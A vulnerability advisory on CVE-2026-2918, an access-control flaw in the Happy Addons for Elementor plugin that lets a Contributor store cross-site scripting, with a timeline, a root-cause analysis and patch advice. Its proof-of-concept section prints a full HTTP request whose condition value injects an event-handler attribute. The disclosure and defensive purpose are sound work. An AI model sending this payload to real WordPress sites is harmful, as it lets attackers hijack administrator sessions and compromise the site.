CVE-2026-2918 affects Happy Addons for Elementor and it is an authenticated Contributor level stored cross site scripting vulnerability in the Theme Builder Template Conditions workflow. The vulnerable AJAX action accepts an arbitrary template_id and performs a broad edit_posts capability check instead of checking the specific ha_library template. A Contributor with access to the Elementor editor nonce can change conditions for another published template and store crafted condition data that is later rendered as unsafe HTML attributes in the Elementor editor. When an administrator opens Template Conditions, the payload can run in the admin browser context, which can lead to nonce theft, privileged actions, and full site compromise.
| CVE | CVE-2026-2918 |
| Plugin Version | Happy Addons for Elementor <= 3.21.0, fixed in 3.21.1 |
| All Time | 13 492 791 |
| Active installations | 400 000+ |
| Publicly Published | March 10, 2026 |
| Last Updated | March 11, 2026 |
| Researcher | Dmitrii Ignatyev |
| PoC | Yes |
| Exploit | No |
| Reference | https://www.cve.org/CVERecord?id=CVE-2026-2918 https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/happy-elementor-addons/happy-addons-for-elementor-3210-insecure-direct-object-reference-to-authenticated-contributor-stored-cross-site-scripting-via-template-conditions |
| Plugin Security Certification by CleanTalk |  |
| Logo of the plugin |  |
PSC by CleantalkJoin the community of developers who prioritize security. Highlight your plugin in the WordPress catalog.
Timeline
| February 13, 2026 | Plugin testing and vulnerability detection in Happy Addons for Elementor have been completed |
| February 13, 2026 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| March 10, 2026 | Registered CVE-2026-2918 |
Discovery of the Vulnerability
The vulnerable surface is the ha_condition_update AJAX action used by the Theme Builder Template Conditions panel. In the affected versions, the request accepts template_id and writes the submitted conditions to the _ha_display_cond metadata for that template. The security boundary fails because the handler checks current_user_can(‘edit_posts’, $template_id), which only confirms a broad role capability and does not verify whether the current user may edit the target ha_library post.
The read side of the workflow also weakens the boundary. The action that returns the rendered conditions HTML has its authorization gate disabled, so the editor workflow can return condition markup without the object level access check that should protect a template. Once the stored condition is read back, the renderer places attacker controlled condition segments into HTML attributes without the escaping expected for an attribute context. That combination turns an unauthorized template condition update into stored JavaScript execution inside Elementor.
Understanding of Stored XSS attacks
Stored XSS in WordPress is dangerous because the attacker only needs to place the payload once. The vulnerable plugin saves attacker supplied data in the database and later serves it to a trusted user. In an editor screen, that trusted user is often a site owner or administrator with active WordPress cookies and valid nonces in the browser. If the plugin renders stored condition data as HTML attributes instead of text, the browser treats the payload as part of the page and can execute an event handler in the administrator context.
Template builders are especially sensitive because they are usually opened by privileged users and they handle site wide layout rules. Access checks for AJAX actions in these workflows must be tied to the exact template object. A general role capability such as edit_posts is not enough when the request includes a template_id that can point to another user’s published template.
Exploiting the Stored XSS Vulnerability
To exploit <strong>CVE-2026-2918</strong>, an authenticated Contributor level attacker can send a crafted condition update after obtaining a valid Elementor editor nonce:
POC:
POC: POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 Accept: application/json, text/javascript, */* Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Referer: http://127.0.0.1/wordpress/wp-admin/post.php?post=576&action=elementor Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Origin: http://127.0.0.1 Cookie: Contributor+ action=ha_condition_update&nonce=HappyAddonsEditor.editor_nonce&template_id=594&template_type=header&conds[]=include/singular/post/1"+onchange="alert(document.domain)"+x="'____
The request stores a condition value that breaks out of the expected attribute value and adds an onchange handler. When an administrator later opens the Template Conditions panel for the affected template, the plugin renders the saved condition HTML in the editor. The browser parses the injected handler as markup in the admin page, so JavaScript runs with the administrator session available to the page.
The demonstration payload uses alert(document.domain) only to confirm code execution. In a real attack, the same execution context could be used to read editor nonces and submit privileged WordPress requests allowed to the administrator.
Recommendations for Improved Security
Site owners should update Happy Addons for Elementor to version 3.21.1 or a newer patched version. The current wordpress.org release is 3.22.0, so updating to the latest available build is the safest operational choice. Sites that allow Contributor accounts should treat Elementor editor access as sensitive until the update is applied.
Developers should use object level capability checks for every AJAX action that modifies template data. For this workflow, the update handler should validate the nonce, verify the template type, and call current_user_can(‘edit_post’, $template_id) before changing _ha_display_cond. Read endpoints that return rendered editor HTML should enforce the same authorization boundary.
By taking proactive measures to address Stored XSS like CVE-2026-2918, WordPress website owners can reduce the risk created by unsafe template condition rendering and protect administrator sessions from client side compromise. Stay vigilant, stay secure.
#WordPressSecurity #StoredXSS #WebsiteSafety #StayProtected #MediumVulnerability
Use CleanTalk solutions to improve the security of your website